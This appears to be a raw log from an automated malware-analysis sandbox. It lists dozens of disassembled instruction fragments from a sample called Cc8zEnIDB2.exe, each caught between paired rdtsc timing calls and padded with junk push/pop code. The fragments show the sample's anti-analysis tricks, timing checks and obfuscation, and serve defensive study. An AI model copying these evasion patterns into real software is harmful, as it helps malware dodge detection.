Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D065DE second address: D065E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D065E4 second address: D065F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D06FFF second address: D07007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D076DA second address: D076DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D055D3 second address: D055D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D055D7 second address: D055DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D055DD second address: D055F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F43E91C545Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D0DCC0 second address: D0DCC8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D0DE72 second address: D0DE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D0DE76 second address: D0DE87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jns 00007F43E8C1FDD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D0DE87 second address: D0DE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D1CED6 second address: D1CF25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F43E8C1FDE8h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jp 00007F43E8C1FDD6h 0x0000001b jmp 00007F43E8C1FDE4h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D1CF25 second address: D1CF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F43E91C545Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C512E3 second address: C512E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D1CA82 second address: D1CAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C5469h 0x00000009 jmp 00007F43E91C5468h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D1CAB8 second address: D1CAD6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F43E8C1FDE6h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D1CAD6 second address: D1CADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D21972 second address: D21977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D21977 second address: D2197D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D212DD second address: D21309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F43E8C1FDE0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D21309 second address: D2131B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43E91C5458h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F43E91C5456h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D2618B second address: D261A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F43E8C1FDDAh 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D261A0 second address: D261C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C5469h 0x00000009 jbe 00007F43E91C5456h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D2F11F second address: D2F12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D308D6 second address: D3090B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jng 00007F43E91C5456h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F43E91C5468h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3090B second address: D30912 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D389AF second address: D389CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C5467h 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D377CD second address: D377E6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F43E8C1FDDEh 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F43E8C1FDD6h 0x00000010 pushad 0x00000011 jp 00007F43E8C1FDD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D377E6 second address: D377FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F43E91C5468h 0x0000000f pushad 0x00000010 je 00007F43E91C5456h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D37944 second address: D37950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D37950 second address: D3795F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C545Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D37AD8 second address: D37AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F43E8C1FDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3C1FF second address: D3C208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3C208 second address: D3C213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F43E8C1FDD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3C360 second address: D3C36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3C36E second address: D3C374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3C374 second address: D3C37F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D3C37F second address: D3C38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D80F88 second address: D80F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D80F8F second address: D80F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: D80F9F second address: D80FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E50EB4 second address: E50EDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE4h 0x00000009 jmp 00007F43E8C1FDE3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E50EDF second address: E50EF9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F43E91C5456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F43E91C5464h 0x00000012 jp 00007F43E91C545Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E558CD second address: E558F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE1h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F43E8C1FDDBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E558F0 second address: E5590C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43E91C545Fh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E5590C second address: E55912 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E5476D second address: E54771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54771 second address: E54788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54788 second address: E5478E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E5478E second address: E54798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F43E8C1FDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54798 second address: E547C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43E91C5465h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jg 00007F43E91C5456h 0x00000012 jp 00007F43E91C5456h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E5492A second address: E5492E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E5492E second address: E54946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F43E91C5456h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jnp 00007F43E91C5456h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54AAA second address: E54AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54AB0 second address: E54AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F43E91C5462h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54C3A second address: E54C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54C40 second address: E54C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54C44 second address: E54C4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54C4B second address: E54C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54D84 second address: E54D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E54D8A second address: E54DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jnp 00007F43E91C5456h 0x0000000c jmp 00007F43E91C5466h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E55321 second address: E55327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E599CF second address: E599D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E599D3 second address: E599DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E599DD second address: E599E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: E599E1 second address: E599E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716000D second address: 7160030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 mov dx, 7CB6h 0x0000000a pop edx 0x0000000b popad 0x0000000c mov dword ptr [esp], ebp 0x0000000f jmp 00007F43E91C545Ah 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push edx 0x0000001a pop esi 0x0000001b mov ecx, ebx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160030 second address: 7160036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160036 second address: 716003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716003A second address: 7160059 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bx, ax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160059 second address: 7160084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5465h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43E91C545Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160084 second address: 716012B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, B461h 0x00000011 mov dx, si 0x00000014 popad 0x00000015 mov dword ptr [esp], ebx 0x00000018 jmp 00007F43E8C1FDE8h 0x0000001d mov ebx, dword ptr [eax+10h] 0x00000020 jmp 00007F43E8C1FDE0h 0x00000025 xchg eax, esi 0x00000026 jmp 00007F43E8C1FDE0h 0x0000002b push eax 0x0000002c jmp 00007F43E8C1FDDBh 0x00000031 xchg eax, esi 0x00000032 pushad 0x00000033 mov dx, cx 0x00000036 mov bx, ax 0x00000039 popad 0x0000003a mov esi, dword ptr [775606ECh] 0x00000040 jmp 00007F43E8C1FDDAh 0x00000045 test esi, esi 0x00000047 pushad 0x00000048 pushad 0x00000049 mov si, 5983h 0x0000004d popad 0x0000004e push ebx 0x0000004f call 00007F43E8C1FDE2h 0x00000054 pop eax 0x00000055 pop edi 0x00000056 popad 0x00000057 jne 00007F43E8C20B4Fh 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 movsx edx, si 0x00000063 mov ebx, eax 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716012B second address: 7160179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov si, C143h 0x0000000f jmp 00007F43E91C5468h 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 mov cl, 1Dh 0x00000019 popad 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F43E91C5462h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160179 second address: 71601EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43E8C1FDE1h 0x00000009 add cl, FFFFFFD6h 0x0000000c jmp 00007F43E8C1FDE1h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F43E8C1FDE0h 0x00000018 xor ax, D9F8h 0x0000001d jmp 00007F43E8C1FDDBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 call dword ptr [77530B60h] 0x0000002c mov eax, 756AE5E0h 0x00000031 ret 0x00000032 pushad 0x00000033 movzx esi, dx 0x00000036 jmp 00007F43E8C1FDE1h 0x0000003b popad 0x0000003c push 00000044h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71601EC second address: 71601F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71601F0 second address: 7160203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160203 second address: 7160209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160209 second address: 716020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716020D second address: 7160234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007F43E91C5467h 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160234 second address: 716023A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716023A second address: 7160277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, cl 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F43E91C5468h 0x00000015 or ecx, 19B49AA8h 0x0000001b jmp 00007F43E91C545Bh 0x00000020 popfd 0x00000021 push ecx 0x00000022 pop edi 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160277 second address: 71602A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F43E8C1FDDEh 0x0000000f push dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ch, bl 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71602A8 second address: 71602AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71602AD second address: 71602B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71602B3 second address: 71602B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
